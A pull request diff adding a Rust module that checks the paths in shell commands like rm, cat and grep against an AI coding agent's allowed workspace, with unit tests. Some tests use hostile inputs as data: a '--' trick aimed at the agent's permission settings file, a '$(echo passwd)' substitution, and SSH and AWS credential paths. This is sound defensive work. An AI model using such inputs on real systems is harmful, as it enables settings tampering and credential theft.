### PR TITLE
feat(bash-validation): port PATH_EXTRACTORS + workspace boundary [3.1.A]

### DIFF
--- a/crates/dasclaw_bash_validation/src/lib.rs
+++ b/crates/dasclaw_bash_validation/src/lib.rs
@@ -14,9 +14,15 @@
 
 use std::path::Path;
 
+pub mod path_validation;
 pub mod permissions;
 pub mod redirects;
 pub mod security;
+pub use path_validation::{
+    check_dangerous_removal_paths, expand_tilde_and_home, extract_paths, has_unsafe_expansion,
+    is_dangerous_removal_path, validate_command_paths, FileOperationType, PathCommand,
+    PathValidationOutcome,
+};
 pub use permissions::PermissionMode;
 pub use redirects::{
     extract_output_redirections, OutputRedirection, RedirectOperator, RedirectionExtraction,

--- a/crates/dasclaw_bash_validation/src/path_validation.rs
+++ b/crates/dasclaw_bash_validation/src/path_validation.rs
@@ -1,0 +1,1303 @@
+//! Path-aware command validation (Phase 3.1.A).
+//!
+//! Ports the data-tables and workspace-boundary core of upstream
+//! `claude-code-main/src/tools/BashTool/pathValidation.ts` so a parsed
+//! `(PathCommand, args)` tuple can be checked against the user's
+//! allowed working directories.
+//!
+//! Scope of this slice
+//! -------------------
+//! - [`PathCommand`] enum covering the 36 path-restricted commands
+//! - [`PATH_EXTRACTORS`][extract_paths] dispatch via [`extract_paths`]
+//! - [`COMMAND_OPERATION_TYPE`][command_operation_type] via
+//!   [`PathCommand::operation_type`]
+//! - [`expand_tilde_and_home`] (literal `~` / `$HOME` only — NOT a full
+//!   shell expansion)
+//! - [`is_dangerous_removal_path`] + [`check_dangerous_removal_paths`]
+//!   (SECURITY PIN S4)
+//! - [`validate_command_paths`] — the workspace-boundary judgment
+//!
+//! Out of scope (handled by later slices)
+//! --------------------------------------
+//! - Output-redirection validation (3.1.B, builds on
+//!   [`crate::redirects`])
+//! - AST argv splitting / `stripSafeWrappers` integration (3.1.B)
+//! - Hook wireup + audit-log contract pin (3.1.C)
+//! - Symlink-escape detection (Phase 3.1 follow-up)
+//!
+//! Security contract (Fail-Closed)
+//! -------------------------------
+//! Every reason a target cannot be reliably validated maps to an
+//! [`PathValidationOutcome::Ask`] (or `Block` for explicit deny):
+//! - Path contains `$` / `%` / leading `=` (shell expansion)
+//! - Path starts with unsupported tilde variant (`~user`, `~+`, `~-`)
+//! - Resolved path falls outside every workspace directory
+//! - `rm` / `rmdir` targets a known-dangerous path (S4)
+//!
+//! Empty path lists are treated as `Passthrough` — the caller (3.1.B)
+//! is responsible for treating an empty parse as Fail-Closed at the
+//! orchestration layer.
+
+use std::path::{Component, Path, PathBuf};
+
+/// Path-restricted command (subset of all shell commands that
+/// `pathValidation.ts` knows how to inspect).
+///
+/// Variants mirror the upstream `PathCommand` union exactly so the
+/// drift surface stays small.
+#[derive(Debug, Clone, Copy, PartialEq, Eq, Hash)]
+#[allow(non_camel_case_types)] // upstream names are lowercase short verbs
+pub enum PathCommand {
+    Cd,
+    Ls,
+    Find,
+    Mkdir,
+    Touch,
+    Rm,
+    Rmdir,
+    Mv,
+    Cp,
+    Cat,
+    Head,
+    Tail,
+    Sort,
+    Uniq,
+    Wc,
+    Cut,
+    Paste,
+    Column,
+    Tr,
+    File,
+    Stat,
+    Diff,
+    Awk,
+    Strings,
+    Hexdump,
+    Od,
+    Base64,
+    Nl,
+    Grep,
+    Rg,
+    Sed,
+    Git,
+    Jq,
+    Sha256sum,
+    Sha1sum,
+    Md5sum,
+}
+
+/// File operation classification mirrored from upstream
+/// `FileOperationType`.
+///
+/// The `Write` / `Create` split matters for downstream slices that
+/// gate auto-approval differently for new files vs. modifications.
+#[derive(Debug, Clone, Copy, PartialEq, Eq)]
+pub enum FileOperationType {
+    Read,
+    Write,
+    Create,
+}
+
+/// Decision returned by [`validate_command_paths`].
+///
+/// Designed to feed directly into Phase 3.1.C's `DecisionReason`
+/// without lossy conversion: `Block` for explicit deny-rule hits,
+/// `Ask` for everything else that fails the boundary check.
+#[derive(Debug, Clone, PartialEq, Eq)]
+pub enum PathValidationOutcome {
+    /// All extracted paths fall inside an allowed workspace dir.
+    Passthrough,
+    /// Hard deny (today only returned by the dangerous-removal gate;
+    /// reserved for explicit deny-rule matching once 3.1.C wires the
+    /// rule engine).
+    Block { reason: String },
+    /// Fall back to user approval. Carries the offending path string
+    /// for richer prompts.
+    Ask {
+        reason: String,
+        blocked_path: Option<String>,
+    },
+}
+
+impl PathCommand {
+    /// Parse a bare command word into a [`PathCommand`].
+    ///
+    /// Returns `None` for any command outside the path-restricted set
+    /// — the caller should treat unknown commands as
+    /// [`PathValidationOutcome::Passthrough`] (no path inspection
+    /// required) at the orchestration layer.
+    #[must_use]
+    pub fn parse(base: &str) -> Option<Self> {
+        use PathCommand::*;
+        Some(match base {
+            "cd" => Cd,
+            "ls" => Ls,
+            "find" => Find,
+            "mkdir" => Mkdir,
+            "touch" => Touch,
+            "rm" => Rm,
+            "rmdir" => Rmdir,
+            "mv" => Mv,
+            "cp" => Cp,
+            "cat" => Cat,
+            "head" => Head,
+            "tail" => Tail,
+            "sort" => Sort,
+            "uniq" => Uniq,
+            "wc" => Wc,
+            "cut" => Cut,
+            "paste" => Paste,
+            "column" => Column,
+            "tr" => Tr,
+            "file" => File,
+            "stat" => Stat,
+            "diff" => Diff,
+            "awk" => Awk,
+            "strings" => Strings,
+            "hexdump" => Hexdump,
+            "od" => Od,
+            "base64" => Base64,
+            "nl" => Nl,
+            "grep" => Grep,
+            "rg" => Rg,
+            "sed" => Sed,
+            "git" => Git,
+            "jq" => Jq,
+            "sha256sum" => Sha256sum,
+            "sha1sum" => Sha1sum,
+            "md5sum" => Md5sum,
+            _ => return None,
+        })
+    }
+
+    /// Stringify back to the lowercase bare-command form.
+    #[must_use]
+    pub fn as_str(self) -> &'static str {
+        use PathCommand::*;
+        match self {
+            Cd => "cd",
+            Ls => "ls",
+            Find => "find",
+            Mkdir => "mkdir",
+            Touch => "touch",
+            Rm => "rm",
+            Rmdir => "rmdir",
+            Mv => "mv",
+            Cp => "cp",
+            Cat => "cat",
+            Head => "head",
+            Tail => "tail",
+            Sort => "sort",
+            Uniq => "uniq",
+            Wc => "wc",
+            Cut => "cut",
+            Paste => "paste",
+            Column => "column",
+            Tr => "tr",
+            File => "file",
+            Stat => "stat",
+            Diff => "diff",
+            Awk => "awk",
+            Strings => "strings",
+            Hexdump => "hexdump",
+            Od => "od",
+            Base64 => "base64",
+            Nl => "nl",
+            Grep => "grep",
+            Rg => "rg",
+            Sed => "sed",
+            Git => "git",
+            Jq => "jq",
+            Sha256sum => "sha256sum",
+            Sha1sum => "sha1sum",
+            Md5sum => "md5sum",
+        }
+    }
+
+    /// Map a command to its [`FileOperationType`] (mirrors upstream
+    /// `COMMAND_OPERATION_TYPE`).
+    #[must_use]
+    pub fn operation_type(self) -> FileOperationType {
+        use FileOperationType::{Create, Read, Write};
+        use PathCommand::*;
+        match self {
+            Mkdir | Touch => Create,
+            Rm | Rmdir | Mv | Cp | Sed => Write,
+            _ => Read,
+        }
+    }
+}
+
+// -- helpers --------------------------------------------------------------
+
+/// `filterOutFlags` — return positional args, honoring POSIX `--`
+/// end-of-options delimiter.
+///
+/// Without this, attack payloads like `rm -- -/../.claude/x` would be
+/// silently dropped by a naive `!starts_with('-')` filter (see
+/// upstream doc comment in `pathValidation.ts`).
+fn filter_out_flags(args: &[String]) -> Vec<String> {
+    let mut out = Vec::with_capacity(args.len());
+    let mut after_dd = false;
+    for a in args {
+        if after_dd {
+            out.push(a.clone());
+        } else if a == "--" {
+            after_dd = true;
+        } else if !a.starts_with('-') {
+            out.push(a.clone());
+        }
+    }
+    out
+}
+
+/// `parsePatternCommand` — generic "pattern then paths" extractor used
+/// by `grep` / `rg` / `jq`.
+fn parse_pattern_command(
+    args: &[String],
+    flags_with_args: &[&str],
+    defaults: &[&str],
+) -> Vec<String> {
+    let mut paths = Vec::new();
+    let mut pattern_found = false;
+    let mut after_dd = false;
+    let mut i = 0;
+    while i < args.len() {
+        let arg = &args[i];
+        if !after_dd && arg == "--" {
+            after_dd = true;
+            i += 1;
+            continue;
+        }
+        if !after_dd && arg.starts_with('-') {
+            let flag = arg.split('=').next().unwrap_or(arg);
+            if matches!(flag, "-e" | "--regexp" | "-f" | "--file" | "--expression") {
+                pattern_found = true;
+            }
+            if flags_with_args.contains(&flag) && !arg.contains('=') {
+                i += 1; // skip flag value
+            }
+            i += 1;
+            continue;
+        }
+        if !pattern_found {
+            pattern_found = true;
+            i += 1;
+            continue;
+        }
+        paths.push(arg.clone());
+        i += 1;
+    }
+    if paths.is_empty() {
+        defaults.iter().map(|s| (*s).to_string()).collect()
+    } else {
+        paths
+    }
+}
+
+fn find_extractor(args: &[String]) -> Vec<String> {
+    const PATH_FLAGS: &[&str] = &[
+        "-newer",
+        "-anewer",
+        "-cnewer",
+        "-mnewer",
+        "-samefile",
+        "-path",
+        "-wholename",
+        "-ilname",
+        "-lname",
+        "-ipath",
+        "-iwholename",
+    ];
+    const GLOBAL_FLAGS: &[&str] = &["-H", "-L", "-P"];
+    let mut paths: Vec<String> = Vec::new();
+    let mut found_non_global = false;
+    let mut after_dd = false;
+    let mut i = 0;
+    while i < args.len() {
+        let arg = &args[i];
+        if after_dd {
+            paths.push(arg.clone());
+            i += 1;
+            continue;
+        }
+        if arg == "--" {
+            after_dd = true;
+            i += 1;
+            continue;
+        }
+        if arg.starts_with('-') {
+            if GLOBAL_FLAGS.contains(&arg.as_str()) {
+                i += 1;
+                continue;
+            }
+            found_non_global = true;
+            // `-newer[acmBt][acmtB]` variants
+            let is_newer_variant = arg.len() == 7 && arg.starts_with("-newer") && {
+                let c = arg.as_bytes()[6];
+                matches!(c, b'a' | b'c' | b'm' | b'B' | b't')
+            };
+            if PATH_FLAGS.contains(&arg.as_str()) || is_newer_variant {
+                if let Some(next) = args.get(i + 1) {
+                    paths.push(next.clone());
+                    i += 1;
+                }
+            }
+            i += 1;
+            continue;
+        }
+        if !found_non_global {
+            paths.push(arg.clone());
+        }
+        i += 1;
+    }
+    if paths.is_empty() {
+        vec![".".to_string()]
+    } else {
+        paths
+    }
+}
+
+fn tr_extractor(args: &[String]) -> Vec<String> {
+    let has_delete = args
+        .iter()
+        .any(|a| a == "-d" || a == "--delete" || (a.starts_with('-') && a.contains('d')));
+    let non_flags = filter_out_flags(args);
+    let skip = if has_delete { 1 } else { 2 };
+    non_flags.into_iter().skip(skip).collect()
+}
+
+fn sed_extractor(args: &[String]) -> Vec<String> {
+    let mut paths = Vec::new();
+    let mut skip_next = false;
+    let mut script_found = false;
+    let mut after_dd = false;
+    let mut i = 0;
+    while i < args.len() {
+        if skip_next {
+            skip_next = false;
+            i += 1;
+            continue;
+        }
+        let arg = &args[i];
+        if !after_dd && arg == "--" {
+            after_dd = true;
+            i += 1;
+            continue;
+        }
+        if !after_dd && arg.starts_with('-') {
+            if arg == "-f" || arg == "--file" {
+                if let Some(next) = args.get(i + 1) {
+                    paths.push(next.clone());
+                    skip_next = true;
+                }
+                script_found = true;
+            } else if arg == "-e" || arg == "--expression" {
+                skip_next = true;
+                script_found = true;
+            } else if arg.contains('e') || arg.contains('f') {
+                script_found = true;
+            }
+            i += 1;
+            continue;
+        }
+        if !script_found {
+            script_found = true;
+            i += 1;
+            continue;
+        }
+        paths.push(arg.clone());
+        i += 1;
+    }
+    paths
+}
+
+fn git_extractor(args: &[String]) -> Vec<String> {
+    // Only `git diff --no-index <a> <b>` is a path-bearing case for our gate.
+    if args.first().map(String::as_str) == Some("diff") && args.iter().any(|a| a == "--no-index") {
+        let rest: Vec<String> = args.iter().skip(1).cloned().collect();
+        filter_out_flags(&rest).into_iter().take(2).collect()
+    } else {
+        Vec::new()
+    }
+}
+
+fn grep_flags() -> &'static [&'static str] {
+    &[
+        "-e",
+        "--regexp",
+        "-f",
+        "--file",
+        "--exclude",
+        "--include",
+        "--exclude-dir",
+        "--include-dir",
+        "-m",
+        "--max-count",
+        "-A",
+        "--after-context",
+        "-B",
+        "--before-context",
+        "-C",
+        "--context",
+    ]
+}
+
+fn rg_flags() -> &'static [&'static str] {
+    &[
+        "-e",
+        "--regexp",
+        "-f",
+        "--file",
+        "-t",
+        "--type",
+        "-T",
+        "--type-not",
+        "-g",
+        "--glob",
+        "-m",
+        "--max-count",
+        "--max-depth",
+        "-r",
+        "--replace",
+        "-A",
+        "--after-context",
+        "-B",
+        "--before-context",
+        "-C",
+        "--context",
+    ]
+}
+
+fn jq_flags() -> &'static [&'static str] {
+    &[
+        "-e",
+        "--expression",
+        "-f",
+        "--from-file",
+        "--arg",
+        "--argjson",
+        "--slurpfile",
+        "--rawfile",
+        "--args",
+        "--jsonargs",
+        "-L",
+        "--library-path",
+        "--indent",
+        "--tab",
+    ]
+}
+
+// -- public API -----------------------------------------------------------
+
+/// `expandTilde` + literal `$HOME` substitution.
+///
+/// Only the safe head-anchored forms are expanded:
+/// - `~` → `$HOME`
+/// - `~/...` → `$HOME/...`
+/// - `$HOME` / `$HOME/...` → `$HOME/...`
+///
+/// All other tilde forms (`~user`, `~+`, `~-`, `~N`) and any other
+/// shell variable reference are left untouched; the caller's
+/// boundary check will reject them via [`has_unsafe_expansion`].
+#[must_use]
+pub fn expand_tilde_and_home(path: &str, home: &Path) -> String {
+    let home_str = home.to_string_lossy();
+    if path == "~" {
+        return home_str.into_owned();
+    }
+    if let Some(rest) = path.strip_prefix("~/") {
+        return format!("{}/{}", home_str, rest);
+    }
+    if path == "$HOME" {
+        return home_str.into_owned();
+    }
+    if let Some(rest) = path.strip_prefix("$HOME/") {
+        return format!("{}/{}", home_str, rest);
+    }
+    path.to_string()
+}
+
+/// Return `true` if the path contains any shell expansion or
+/// unsupported tilde variant. Mirrors the TOCTOU rejections in
+/// upstream `validatePath` and is a Fail-Closed signal.
+#[must_use]
+pub fn has_unsafe_expansion(path: &str) -> bool {
+    if path.starts_with('=') {
+        return true; // zsh equals-expansion
+    }
+    if path.starts_with('~') && path != "~" && !path.starts_with("~/") {
+        return true; // ~user / ~+ / ~- / ~N
+    }
+    // `$HOME` head-form is already expanded by `expand_tilde_and_home`;
+    // any remaining `$` or `%` indicates further expansion we don't model.
+    path.contains('$') || path.contains('%')
+}
+
+/// Path-extractor dispatcher (mirrors upstream `PATH_EXTRACTORS`).
+///
+/// `args` is expected to be the already-tokenized argv tail (without
+/// the base command). `home` is consulted for `cd` with no args
+/// (upstream uses `homedir()` directly).
+#[must_use]
+pub fn extract_paths(cmd: PathCommand, args: &[String], home: &Path) -> Vec<String> {
+    use PathCommand::*;
+    match cmd {
+        Cd => {
+            if args.is_empty() {
+                vec![home.to_string_lossy().into_owned()]
+            } else {
+                vec![args.join(" ")]
+            }
+        }
+        Ls => {
+            let p = filter_out_flags(args);
+            if p.is_empty() {
+                vec![".".to_string()]
+            } else {
+                p
+            }
+        }
+        Find => find_extractor(args),
+        Tr => tr_extractor(args),
+        Grep => {
+            let mut paths = parse_pattern_command(args, grep_flags(), &[]);
+            // `-r`/`-R`/`--recursive` with no paths → current dir
+            if paths.is_empty()
+                && args
+                    .iter()
+                    .any(|a| a == "-r" || a == "-R" || a == "--recursive")
+            {
+                paths.push(".".to_string());
+            }
+            paths
+        }
+        Rg => parse_pattern_command(args, rg_flags(), &["."]),
+        Sed => sed_extractor(args),
+        Jq => parse_pattern_command(args, jq_flags(), &[]),
+        Git => git_extractor(args),
+        // Simple commands — just filter flags.
+        Mkdir | Touch | Rm | Rmdir | Mv | Cp | Cat | Head | Tail | Sort | Uniq | Wc | Cut
+        | Paste | Column | File | Stat | Diff | Awk | Strings | Hexdump | Od | Base64 | Nl
+        | Sha256sum | Sha1sum | Md5sum => filter_out_flags(args),
+    }
+}
+
+/// Return `true` if `resolved` is a known-dangerous removal target.
+///
+/// Mirrors upstream `isDangerousRemovalPath`: bare wildcard, root,
+/// home, direct root children. The `home` arg lets tests inject a
+/// deterministic value rather than rely on `dirs::home_dir`.
+#[must_use]
+pub fn is_dangerous_removal_path(resolved: &str, home: &Path) -> bool {
+    let forward = resolved.replace('\\', "/");
+    if forward == "*" || forward.ends_with("/*") {
+        return true;
+    }
+    let normalized: &str = if forward == "/" {
+        "/"
+    } else {
+        forward.trim_end_matches('/')
+    };
+    if normalized == "/" {
+        return true;
+    }
+    let home_norm = home.to_string_lossy().replace('\\', "/");
+    let home_norm = home_norm.trim_end_matches('/');
+    if !home_norm.is_empty() && normalized == home_norm {
+        return true;
+    }
+    // direct child of root: parent is "/"
+    if let Some(parent) = Path::new(normalized).parent() {
+        if parent == Path::new("/") {
+            return true;
+        }
+    }
+    false
+}
+
+/// `checkDangerousRemovalPaths` — only applicable to `rm` / `rmdir`.
+///
+/// Returns `Some(Ask { … })` if any extracted target hits the
+/// dangerous-path list. Always allow downstream tools to compose this
+/// with the workspace-boundary check (upstream runs both).
+#[must_use]
+pub fn check_dangerous_removal_paths(
+    cmd: PathCommand,
+    args: &[String],
+    cwd: &Path,
+    home: &Path,
+) -> Option<PathValidationOutcome> {
+    if cmd != PathCommand::Rm && cmd != PathCommand::Rmdir {
+        return None;
+    }
+    let paths = extract_paths(cmd, args, home);
+    for raw in &paths {
+        let stripped = strip_outer_quotes(raw);
+        let expanded = expand_tilde_and_home(stripped, home);
+        let absolute = resolve_logical(&expanded, cwd);
+        if is_dangerous_removal_path(&absolute, home) {
+            return Some(PathValidationOutcome::Ask {
+                reason: format!(
+                    "Dangerous {} operation detected: '{}' — \
+                     critical system path requires explicit approval",
+                    cmd.as_str(),
+                    absolute
+                ),
+                blocked_path: Some(absolute),
+            });
+        }
+    }
+    None
+}
+
+/// Workspace-boundary judgment for the given command.
+///
+/// Returns the first non-`Passthrough` outcome encountered while
+/// iterating extracted paths. Order:
+/// 1. Dangerous-removal check (for `rm` / `rmdir`)
+/// 2. Per-path: expansion guard → `~`/`$HOME` expand → absolute path
+///    → check against `workspace_dirs`
+///
+/// `workspace_dirs` is the union of "allowed working directories"
+/// (cwd + extra `--add-dir` paths). The first match wins.
+#[must_use]
+pub fn validate_command_paths(
+    cmd: PathCommand,
+    args: &[String],
+    cwd: &Path,
+    workspace_dirs: &[PathBuf],
+    home: &Path,
+) -> PathValidationOutcome {
+    if let Some(dangerous) = check_dangerous_removal_paths(cmd, args, cwd, home) {
+        return dangerous;
+    }
+    let paths = extract_paths(cmd, args, home);
+    for raw in &paths {
+        let stripped = strip_outer_quotes(raw);
+        if has_unsafe_expansion(stripped) {
+            return PathValidationOutcome::Ask {
+                reason: format!(
+                    "{} target '{}' uses shell expansion — Claude Code \
+                     cannot safely resolve it without manual review",
+                    cmd.as_str(),
+                    stripped
+                ),
+                blocked_path: Some(stripped.to_string()),
+            };
+        }
+        let expanded = expand_tilde_and_home(stripped, home);
+        let absolute = resolve_logical(&expanded, cwd);
+        if !path_in_workspace(&absolute, workspace_dirs) {
+            return PathValidationOutcome::Ask {
+                reason: format!(
+                    "{} target '{}' is outside the allowed workspace \
+                     directories — requires explicit approval",
+                    cmd.as_str(),
+                    absolute
+                ),
+                blocked_path: Some(absolute),
+            };
+        }
+    }
+    PathValidationOutcome::Passthrough
+}
+
+// -- internal path helpers ------------------------------------------------
+
+fn strip_outer_quotes(s: &str) -> &str {
+    let bytes = s.as_bytes();
+    if bytes.len() >= 2 {
+        let first = bytes[0];
+        let last = bytes[bytes.len() - 1];
+        if (first == b'"' && last == b'"') || (first == b'\'' && last == b'\'') {
+            return &s[1..s.len() - 1];
+        }
+    }
+    s
+}
+
+/// Logical (no-IO) absolute-path resolution.
+///
+/// - If `path` is absolute, normalize `.`/`..` segments
+/// - Otherwise prepend `cwd` and normalize
+///
+/// Does NOT touch the filesystem; symlink escape is handled by a
+/// later slice (see Phase 3.1 follow-up §6 OQ).
+fn resolve_logical(path: &str, cwd: &Path) -> String {
+    let p = Path::new(path);
+    let combined = if p.is_absolute() {
+        p.to_path_buf()
+    } else {
+        cwd.join(p)
+    };
+    normalize_path(&combined).to_string_lossy().into_owned()
+}
+
+fn normalize_path(p: &Path) -> PathBuf {
+    let mut out = PathBuf::new();
+    for comp in p.components() {
+        match comp {
+            Component::Prefix(pre) => out.push(pre.as_os_str()),
+            Component::RootDir => out.push("/"),
+            Component::CurDir => {}
+            Component::ParentDir => {
+                let popped = out.pop();
+                if !popped {
+                    out.push("..");
+                }
+            }
+            Component::Normal(seg) => out.push(seg),
+        }
+    }
+    if out.as_os_str().is_empty() {
+        PathBuf::from(".")
+    } else {
+        out
+    }
+}
+
+fn path_in_workspace(absolute: &str, workspace_dirs: &[PathBuf]) -> bool {
+    if workspace_dirs.is_empty() {
+        return false; // Fail-Closed: empty workspace = no allowed paths
+    }
+    let abs_path = Path::new(absolute);
+    for dir in workspace_dirs {
+        let dir_norm = normalize_path(dir);
+        if abs_path.starts_with(&dir_norm) {
+            return true;
+        }
+    }
+    false
+}
+
+// -------------------------------------------------------------------------
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+
+    fn home() -> PathBuf {
+        PathBuf::from("/home/user")
+    }
+    fn ws() -> Vec<PathBuf> {
+        vec![PathBuf::from("/home/user/proj")]
+    }
+    fn cwd() -> PathBuf {
+        PathBuf::from("/home/user/proj")
+    }
+    fn args(xs: &[&str]) -> Vec<String> {
+        xs.iter().map(|s| (*s).to_string()).collect()
+    }
+
+    // -- PathCommand enum ------------------------------------------------
+
+    #[test]
+    fn parse_recognizes_all_36_commands() {
+        let names = [
+            "cd",
+            "ls",
+            "find",
+            "mkdir",
+            "touch",
+            "rm",
+            "rmdir",
+            "mv",
+            "cp",
+            "cat",
+            "head",
+            "tail",
+            "sort",
+            "uniq",
+            "wc",
+            "cut",
+            "paste",
+            "column",
+            "tr",
+            "file",
+            "stat",
+            "diff",
+            "awk",
+            "strings",
+            "hexdump",
+            "od",
+            "base64",
+            "nl",
+            "grep",
+            "rg",
+            "sed",
+            "git",
+            "jq",
+            "sha256sum",
+            "sha1sum",
+            "md5sum",
+        ];
+        for n in names {
+            let parsed = PathCommand::parse(n).expect("known command");
+            assert_eq!(parsed.as_str(), n, "round-trip name mismatch");
+        }
+    }
+
+    #[test]
+    fn parse_rejects_unknown_commands() {
+        assert!(PathCommand::parse("python").is_none());
+        assert!(PathCommand::parse("docker").is_none());
+        assert!(PathCommand::parse("").is_none());
+    }
+
+    #[test]
+    fn operation_type_classifies_writes_and_reads() {
+        use FileOperationType::*;
+        assert_eq!(PathCommand::Rm.operation_type(), Write);
+        assert_eq!(PathCommand::Sed.operation_type(), Write);
+        assert_eq!(PathCommand::Mkdir.operation_type(), Create);
+        assert_eq!(PathCommand::Touch.operation_type(), Create);
+        assert_eq!(PathCommand::Cat.operation_type(), Read);
+        assert_eq!(PathCommand::Ls.operation_type(), Read);
+        assert_eq!(PathCommand::Git.operation_type(), Read);
+    }
+
+    // -- extract_paths simple commands -----------------------------------
+
+    #[test]
+    fn extract_simple_filters_flags() {
+        let out = extract_paths(
+            PathCommand::Cat,
+            &args(&["-n", "/etc/hosts", "--", "-weird"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["/etc/hosts".to_string(), "-weird".to_string()]);
+    }
+
+    #[test]
+    fn extract_rm_honors_double_dash_security_pin() {
+        // Without `--` handling the attack arg below would be silently dropped.
+        let out = extract_paths(
+            PathCommand::Rm,
+            &args(&["--", "-/../.claude/settings.local.json"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["-/../.claude/settings.local.json".to_string()]);
+    }
+
+    #[test]
+    fn extract_cd_no_args_returns_home() {
+        let out = extract_paths(PathCommand::Cd, &args(&[]), &home());
+        assert_eq!(out, vec!["/home/user".to_string()]);
+    }
+
+    #[test]
+    fn extract_cd_joins_args_as_single_path() {
+        // `cd path with spaces` upstream behavior: join everything.
+        let out = extract_paths(PathCommand::Cd, &args(&["my", "dir"]), &home());
+        assert_eq!(out, vec!["my dir".to_string()]);
+    }
+
+    #[test]
+    fn extract_ls_defaults_to_current_dir() {
+        let out = extract_paths(PathCommand::Ls, &args(&["-la"]), &home());
+        assert_eq!(out, vec![".".to_string()]);
+    }
+
+    // -- extract_paths find ----------------------------------------------
+
+    #[test]
+    fn extract_find_collects_roots_before_first_predicate() {
+        let out = extract_paths(
+            PathCommand::Find,
+            &args(&["src", "tests", "-name", "*.rs"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["src".to_string(), "tests".to_string()]);
+    }
+
+    #[test]
+    fn extract_find_picks_up_path_flag_values() {
+        let out = extract_paths(
+            PathCommand::Find,
+            &args(&[".", "-newer", "stamp", "-name", "*.txt"]),
+            &home(),
+        );
+        assert_eq!(out, vec![".".to_string(), "stamp".to_string()]);
+    }
+
+    #[test]
+    fn extract_find_double_dash_security_pin() {
+        let out = extract_paths(PathCommand::Find, &args(&["--", "-/../etc"]), &home());
+        assert_eq!(out, vec!["-/../etc".to_string()]);
+    }
+
+    // -- extract_paths pattern commands ----------------------------------
+
+    #[test]
+    fn extract_grep_separates_pattern_from_paths() {
+        let out = extract_paths(
+            PathCommand::Grep,
+            &args(&["-i", "needle", "a.txt", "b.txt"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["a.txt".to_string(), "b.txt".to_string()]);
+    }
+
+    #[test]
+    fn extract_grep_recursive_no_paths_defaults_to_cwd() {
+        let out = extract_paths(PathCommand::Grep, &args(&["-r", "todo"]), &home());
+        assert_eq!(out, vec![".".to_string()]);
+    }
+
+    #[test]
+    fn extract_rg_defaults_to_cwd() {
+        let out = extract_paths(PathCommand::Rg, &args(&["needle"]), &home());
+        assert_eq!(out, vec![".".to_string()]);
+    }
+
+    // -- extract_paths sed / jq / git -----------------------------------
+
+    #[test]
+    fn extract_sed_picks_up_script_file_via_dash_f() {
+        let out = extract_paths(
+            PathCommand::Sed,
+            &args(&["-f", "edits.sed", "input.txt"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["edits.sed".to_string(), "input.txt".to_string()]);
+    }
+
+    #[test]
+    fn extract_sed_inline_expression_then_file() {
+        let out = extract_paths(
+            PathCommand::Sed,
+            &args(&["-e", "s/a/b/", "input.txt"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["input.txt".to_string()]);
+    }
+
+    #[test]
+    fn extract_jq_filter_and_files() {
+        let out = extract_paths(PathCommand::Jq, &args(&[".", "a.json", "b.json"]), &home());
+        assert_eq!(out, vec!["a.json".to_string(), "b.json".to_string()]);
+    }
+
+    #[test]
+    fn extract_git_diff_no_index_returns_two_paths() {
+        let out = extract_paths(
+            PathCommand::Git,
+            &args(&["diff", "--no-index", "a.txt", "b.txt"]),
+            &home(),
+        );
+        assert_eq!(out, vec!["a.txt".to_string(), "b.txt".to_string()]);
+    }
+
+    #[test]
+    fn extract_git_status_returns_no_paths() {
+        let out = extract_paths(PathCommand::Git, &args(&["status"]), &home());
+        assert!(out.is_empty());
+    }
+
+    // -- extract_paths tr ------------------------------------------------
+
+    #[test]
+    fn extract_tr_with_delete_flag_skips_one_set() {
+        // `tr -d 'a-z' < file` → after filter_out_flags = ["a-z"], skip 1 = []
+        let out = extract_paths(PathCommand::Tr, &args(&["-d", "a-z"]), &home());
+        assert!(out.is_empty());
+    }
+
+    // -- expand_tilde_and_home ------------------------------------------
+
+    #[test]
+    fn expand_tilde_alone() {
+        assert_eq!(expand_tilde_and_home("~", &home()), "/home/user");
+    }
+
+    #[test]
+    fn expand_tilde_with_subpath() {
+        assert_eq!(
+            expand_tilde_and_home("~/.ssh/id_rsa", &home()),
+            "/home/user/.ssh/id_rsa"
+        );
+    }
+
+    #[test]
+    fn expand_home_literal_alone() {
+        assert_eq!(expand_tilde_and_home("$HOME", &home()), "/home/user");
+    }
+
+    #[test]
+    fn expand_home_literal_with_subpath() {
+        assert_eq!(
+            expand_tilde_and_home("$HOME/.aws/credentials", &home()),
+            "/home/user/.aws/credentials"
+        );
+    }
+
+    #[test]
+    fn expand_leaves_user_variants_untouched() {
+        // Caller's `has_unsafe_expansion` is responsible for rejecting these.
+        assert_eq!(expand_tilde_and_home("~root", &home()), "~root");
+        assert_eq!(expand_tilde_and_home("~+", &home()), "~+");
+    }
+
+    // -- has_unsafe_expansion -------------------------------------------
+
+    #[test]
+    fn rejects_dollar_expansion() {
+        assert!(has_unsafe_expansion("$EVIL"));
+        assert!(has_unsafe_expansion("/etc/$(echo passwd)"));
+    }
+
+    #[test]
+    fn rejects_percent_expansion() {
+        assert!(has_unsafe_expansion("%USERPROFILE%"));
+    }
+
+    #[test]
+    fn rejects_zsh_equals_expansion() {
+        assert!(has_unsafe_expansion("=rg"));
+    }
+
+    #[test]
+    fn rejects_tilde_user_variants() {
+        assert!(has_unsafe_expansion("~root"));
+        assert!(has_unsafe_expansion("~+"));
+        assert!(has_unsafe_expansion("~-"));
+        assert!(has_unsafe_expansion("~1"));
+    }
+
+    #[test]
+    fn accepts_safe_paths() {
+        assert!(!has_unsafe_expansion("/etc/passwd"));
+        assert!(!has_unsafe_expansion("./relative/path"));
+        assert!(!has_unsafe_expansion("~/already-head-form"));
+        assert!(!has_unsafe_expansion("~"));
+    }
+
+    // -- is_dangerous_removal_path --------------------------------------
+
+    #[test]
+    fn dangerous_root_and_wildcards() {
+        assert!(is_dangerous_removal_path("/", &home()));
+        assert!(is_dangerous_removal_path("*", &home()));
+        assert!(is_dangerous_removal_path("/tmp/*", &home()));
+    }
+
+    #[test]
+    fn dangerous_home_match() {
+        assert!(is_dangerous_removal_path("/home/user", &home()));
+        assert!(is_dangerous_removal_path("/home/user/", &home()));
+    }
+
+    #[test]
+    fn dangerous_direct_root_children() {
+        assert!(is_dangerous_removal_path("/etc", &home()));
+        assert!(is_dangerous_removal_path("/usr", &home()));
+        assert!(is_dangerous_removal_path("/tmp", &home()));
+    }
+
+    #[test]
+    fn safe_deep_paths() {
+        assert!(!is_dangerous_removal_path("/usr/local/bin", &home()));
